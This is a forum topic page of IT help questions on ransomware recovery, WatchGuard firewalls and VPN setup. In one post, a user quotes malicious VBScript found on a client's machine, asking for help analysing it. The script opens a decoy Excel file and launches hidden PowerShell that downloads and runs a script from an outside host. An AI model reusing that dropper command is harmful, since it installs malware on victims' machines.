Ransomware

158

Solutions

408

Contributors

Ransomware is malicious software, designed to block data access in order to extort money. As a form of malware, ransomware is most often used to infiltrate devices through infected emails or links that, in turn, recognize and take advantage of vulnerabilities in the operating system and installed third-party software.

Share tech news, updates, or what's on your mind.

Sign up to Post

Software recommendation for Bare Metal Restore of Dissimilar Hardware.  I have an older Asus VivoBook S500C running current version of Windows 10.  I would like to purchase a new laptop and do an image restore without starting from scratch reinstalling individual software packages.
0
Do You Have a Trusted Wireless Environment?
Do You Have a Trusted Wireless Environment?

A Trusted Wireless Environment is a framework for building a complete Wi-Fi network that is fast, easy to manage, and secure.

We've just installed a new next-gen firewall and I need some assistance getting some communication between two of the interfaces.
It's a Watchguard T35 and we have our WAN on Eth0, LAN1 on Eth1, and LAN2 on Eth2.
Our WAN has a static IP, but we have /27 block of public IP's routed (at the ISP level) to our WAN for use by public facing servers.

I have that part of it working OK.  Servers connected to the LAN2 all have their static IP assignment and IP checks on the internet show the correct IPs.  This interface in the Watchguard is set as "Optional".

LAN1, is our private LAN and is set as "Trust".  Internet traffic and NAT/port forwarding is all working OK, but I cannot seem to get access to LAN2 from LAN1 devices.

I've created a firewall policy with "ANY" for the packet filtering and have set both 192.168.1.0/24 and 203.xx.xx.0/27 in both the To and From boxes.  The rule is set to allow and enabled.
But I cannot browse (using the IP or UNC name) or access any of the LAN2 resources from LAN1.  Nor can LAN2 access any of the LAN1 resources.

I'm new to Watchguard and thought I might ask here for any things I may have overlooked before lodging a support ticket with Watchguard support.
1
I am installing WatchGuard SSL Vpn software which is using Open VPN software and it has TAP network driver but I can't install it unattended. Does anybody know how to install OpenVPN un-attended including TAP-Windows adapter?
0
Dear Team,
   My Domain Controller Sysvol folder is affected by ransomware. DC is working fine now .
How do i recreate the sysvol files. I have only one DC and  no backup.

Server OS is Windows 2012.
I cannot reinstall DC since i have my exchange running.
0
I have a watchguard M270, the customer has a hosted server they connect to via ipsec. What policy could I enable to allow the ipsec vpn outbound.
0
Hasn’t happened but just wondering

If my google drive got hit and all files encrypted can I revert back to last weeks clean files ?

So I’m asking does google drove afford any sort of fall back plan for this scenario ?

Thanks
2
I have a user who is using the Watchguard VPN client software. They have been using it on Windows 10 Pro (v 1709) for 6 months without issue. The UAC prompt suddenly started appearing this morning when they try to run the software. No updates for Windows or the software have been installed. I have 60 other users that are using it without this problem also. I am at a loss as to why this would suddenly start needing elevated privileges to run. Does anyone know why this would happen or how to fix it? I am not going to disable user account control or give them admin rights.
0
hello all,

I am an owner of a small business in my town, I got infected by a ransomware, with .rapid extension, he wants a big ransom that I cant pay.
any solution for this version. please help.
0
I have Acronis for backups to tape.  I want to be able to backup "System State" of my DC.  What files or folders do I need to make sure get backed up?
0
I had this question after viewing Watchguard Firewall xFlow Configuration.
0
Redefine Your Security with AI & Machine Learning
Redefine Your Security with AI & Machine Learning

The implications of AI and machine learning in cyber security are massive and constantly growing, creating both efficiencies and new challenges across the board. Check out our on-demand webinar to learn more about how AI can help your organization!

Customer has a watchguard T10 firebox firewall for a pos system.  The POS server connects directly to the trusted network port. no other computers connect to that network.  

Customer wants to setup an access point for wifi.  The watchguard has a 3rd port.  I want to activate it as a second network and allow wireless devices to access the internet.  

The watchguard firewall does not have built in wifi.  We purchased an access point that we plan to connect to the 3rd port.

This is a restaurant, there are no office pc's or network printers.

Need suggestions on policy's, the device has contenfilter subscriptions.  I want to enforce them on the 3rd port too if possible.
0
We believe a client has been hacked but can't determine what the vb script is doing to the data, it doesn't look like ransomware.
can you help point us in a direction to what degree this hack could be.

below is the vbscript and a picture of a folder it has been found in. you will see that actual excel doc has been hidden and a fake excel doc in it's place. it looks like when the fake excel doc is run, it opens up the vbscript and the hidden excel doc

VBscript
Set fso = CreateObject("Scripting.FileSystemObject")
Set shl = CreateObject("WScript.Shell")
Set shp = CreateObject("WScript.Shell")
path=shl.ExpandEnvironmentStrings("%APPDATA%")+"\"+GetUUID(".")
exists = fso.FolderExists(path)
Set objFile = fso.GetFile(Wscript.ScriptFullName)
rr = fso.GetParentFolderName(objFile)+"\Project 8192 LNG STS System Certification Log.xlsx"
if (exists) then
shl.Run("explorer.exe "+rr+"")
Else
shl.Run("explorer.exe "+rr+"")
shp.Run "powershell.exe  -windowstyle hidden -executionpolicy bypass -command iex((nEw-ObJect ('NEt.WeBclient')).('DowNLoAdStrInG').invoKe(('https://cflfuppn.eu/sload/2.0/netF.ps1')))",0,True
Set shp = Nothing
end if
Function GetUUID(strComputer)
Dim objWmi, colItems, objItem, strUUID, blnValidUUID
Set objWmi = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWmi.ExecQuery("Select * from Win32_ComputerSystemProduct")
strUUID = ""
blnValidUUID = False
For Each objItem in colItems
strUUID = objItem.UUID
If Not …
0
How to block RFC 1918 and create object-groups and use that object-groups to block any udp traffic inbound to the external interface on a WatchGuard Firebox (M200)?
0
We have a Watchguard M200 firewall that we would like to limit inbound/outbound bandwidth to 20Mbps on our External (WAN) interface. Our ISP allows for 40Mbps total bandwidth. I've gone into Traffic Management and changed the interface to limit bandwidth to 20Mbps but this only seems to apply to upstream outbound traffic. Inbound traffic is still coming in at the fulll 40Mbps. Is it possible to also limit inbound traffic to 20Mbps?

Thank you
0
Hi!
I´m trying to use programm by James-Gourley to decrypt a 1.4.0.0 version of Cryakl  . Some files are decrypted correctly, and other files are not decrypted with  "encryption signature mismatch" message. Help me please. Sample files https://dropmefiles.com/769Q7   More examples of unencrypted files https://dropmefiles.com/CZ7xH
0
need help with decrypt files after Cryakl 1.5.1/
encrypted and original file attach
0
I have an urgent issue and can't seem to find an answer. 

The client has server 2012 A software VPN is setup.  Which is no longer working. 
server had GDATA installed which I removed and reinstalled webroot. Then restarted the server.

 Since this I have not been able to get the VPN working again. I have tried running removal tools for Webroot, Gdata and disabled the windows firewall, however, no success at all. Still no VPN access. 

Does anyone have any suggestions ? 

Error is

The network connection between your computer and the VPN server could not be established because the remote server is not responding. This could be because one of the network devices (e.g, firewalls, NAT, routers, etc) between your computer and the remote server is not configured to allow VPN connections. Please contact your Administrator or your service provider to determine which device may be causing the problem.
0
I am having an issue accessing a secure ftp web site from a network.  The network uses a watchguard xtm 25 appliance and then runs Server 2008 R2 as the network server.  The workstations are all Windows 7 Pro.

The URL is https://oebsftp.ontarioenergyboard.ca.  This should bring me to a log in page, but instead the following message

The message from IE 11 is as follows:

This page can’t be displayed


Turn on TLS 1.0, TLS 1.1, and TLS 1.2 in Advanced settings and try connecting to https://oebsftp.ontarioenergyboard.ca  again. If this error persists, it is possible that this site uses an unsupported protocol or cipher suite such as RC4 (link for the details), which is not considered secure. Please contact your site administrator.

Fire fox give the following:
Secure Connection Failed

The connection to oebsftp.ontarioenergyboard.ca was interrupted while the page was loading.

    The page you are trying to view cannot be shown because the authenticity of the received data could not be verified.
    Please contact the website owners to inform them of this problem.
Often the Ontario energy board upload sites are designed for IE only.

I do not see anything in the Watchguard appliance but may be overlooking something.

The server uses SEP 14.0 for both anti-virus and Firewall

As a separate issue, email using Outlook 2013 cannot use ssl either
0
HI James ..... I´m back here .... Sadly
I've another computer infected with Fairytail .... I think it´s the same version that i've cleaned earlier.
I´ve Just downloaded your decryptor but i think something went wrong with it.
The earlier version worked fine with me .... but this one seems to give me some trouble. I used it in 3 different PCs' and i received the same error. All of them were running Windows 10 64 bits.
I have a clean file and the same file encrypted to use in the decryptor.
But as soon i select the encrypted file, i receive the error i attach
0
CompTIA Security+
LVL 12
CompTIA Security+

Learn the essential functions of CompTIA Security+, which establishes the core knowledge required of any cybersecurity role and leads professionals into intermediate-level cybersecurity jobs.

We have a WatchGuard M300. We currently have an internet connection that is too small for our needs. Our issue is the upload speed is capped at 20Mbps. With the M300 can we add a second internet connection and have our internet traffic divided evenly between these two connections?
0
Hi All

This is not a question as such im looking for information ideas on how i can pass VLAN's across a ipsec VPN tunnel

Ive got 16 VLANS that is hosted at one site located a few hundred kilometers away from my secondary site and i want to be able to push the vlans from the main site to the secondary site and then be able to distriube those via a switch at the remote site

The sites currently will be connected via either Sonicwalls or WatchGuard UTM Appliances

Any help or suggestions on this would be greatly appreciated
0
Dear All,

Friend of mines company server got hijacked by embassy@scryptmail.com using  Disk-crypt after much negotiation we got the codes (reduced prices £4000 to £300) so the laptops have all been decrypted; The sever dell using raid 1 mirror Perc S300 controller hasn’t been straight forward; eventually worked out how I had to boot from a alternate SSD with driver an SMB server 2011 etc, I’ve now decrypted the drives even though the server boot BSODS (sort later) but does anyone know how to remove the demand at boot from the MBR please for the password.

Regards
D
0
Hello Experts,

I have got XTM 26 series watchguard Firewall in the company. We are now in the phase of upgrading internet bandwidth from 20 Mbps to 100 Mbps.  According to service provider, I have to setup firewall for traffic shaping but I am not sure watchguard support it or not?

Parameters to configure on firewall are; Shaping Rate, Shaping burst, Extended burst.


I do not want to go with other option of adding a router before the firewall, as it may stops all applications running in branch office.

Can anybody help me with?
0
Watchguard to Draytek site to site VPN - 2 tunnels required.

WG side has local IP of 192.168.1.1/24 and this needs linking to the draytek which has 2 LAN 10.0.0.1/24 and 192.168.100.1/24

I need a tunnel for both

Now i can set this up with one tunnel no issue. but cant see anywhere to add a second tunnel on the draytek end. Ive herd GRE might be the answer my question but havnt used this before.

How do i add a second tunnel. I have also tried a second VPN with the other tunnel but this causes both VPNs to alternate and not work correctly. any help or questions welcome
0
i currently have a watchguard firebox with UTM and using vmware.
im currently upgrading the environment to the latest vmware and nsx.
is it recommended to eliminate the watchguard and ONLY use NSX?
0

Ransomware

158

Solutions

408

Contributors

Ransomware is malicious software, designed to block data access in order to extort money. As a form of malware, ransomware is most often used to infiltrate devices through infected emails or links that, in turn, recognize and take advantage of vulnerabilities in the operating system and installed third-party software.